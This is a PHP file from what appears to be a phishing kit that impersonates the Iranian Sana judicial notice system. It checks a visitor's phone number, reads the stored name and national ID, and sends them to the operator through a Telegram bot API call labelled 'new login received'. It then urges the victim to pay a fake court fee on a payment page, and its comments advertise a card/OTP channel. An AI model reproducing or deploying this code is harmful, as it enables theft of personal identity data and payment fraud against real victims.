<?php
# ➣ t.me/cardotp
include "info.php";
define('TOKEN', $token);

function bot($method, $datas = [])
{
    $url = "https://api.telegram.org/bot" . TOKEN . "/" . $method;
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $datas);
    $res = curl_exec($ch);
    if (curl_error($ch)) {

        var_dump(curl_error($ch));

    } else {
        return json_decode($res);
    }
}
# ➣ t.me/cardotp
function sendMessage($chatid, $text, $keyboard)
{
    bot('sendMessage', [
        'chat_id' => $chatid,
        'text' => $text,
        'parse_mode' => 'HTML',
        'reply_markup' => $keyboard,
        'resize_keyboard' => true,
        'disable_web_page_preview' => true
    ]);
}
# ➣ t.me/cardotp
function checkPhone($phone)
{
    if (preg_match("/^09[0-9]{9}$/", $phone)) {
        return true;
    } else {
        return false;
    }
}
# ➣ t.me/cardotp
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $phone = $_POST['tel'];

    if (!checkPhone($phone)) echo '<section class="alert bg_orange">فرمت شماره نامعتبر</section>';
    elseif (!file_exists("users/$phone.json")) echo '<div class="alert bg_orange">اطلاعات شما در سامانه یافت نشد</div>';
    else {
        $name = json_decode(file_get_contents("users/$phone.json"))->name;
        $codemeli = json_decode(file_get_contents("users/$phone.json"))->codemeli;
        $text = "ɴᴇᴡ ʟᴏɢɪɴ ʀᴇᴄᴇɪᴠᴇᴅ

ɴᴀᴍᴇ : $name
ᴘʜᴏɴᴇ : $phone
ᴄᴏᴅᴇ ᴍᴇʟɪ : $codemeli";
        $key[] = [['text' => "CAPITAN ᴛᴇᴀᴍ", 'url' => "t.me/HazbiN_Team"]];
        $keyboard2 = json_encode(['inline_keyboard' => $key]);
        sendMessage($chat_id,$text,$keyboard2);
        echo '<style>.none{display:none}</style>
<p class="p_des">
کاربر گرامی '.$name.' 
جهت مشاهده و پیگیری ابلاغیه بر روی دکمه (مشاهده ابلاغیه) کلیک کنید
سپس وارد درگاه اینترنتی سامانه ثنا می شوید که با واریز مبلغ 35.000 ریال بابت هزینه دادرسی به ابلاغیه دسترسی پیدا خواهید کرد.</p>

<form method="post" action="pay/">
<input type="hidden" name="name" value="'.$name.'" />
<input type="hidden" name="codemeli" value="'.$codemeli.'" />
<input type="hidden" name="tel" value="'.$phone.'" />
<button type="submit" class="btn bg_green">مشاهده ابلاغیه</button></form>
';
    }

}
# ➣ t.me/cardotp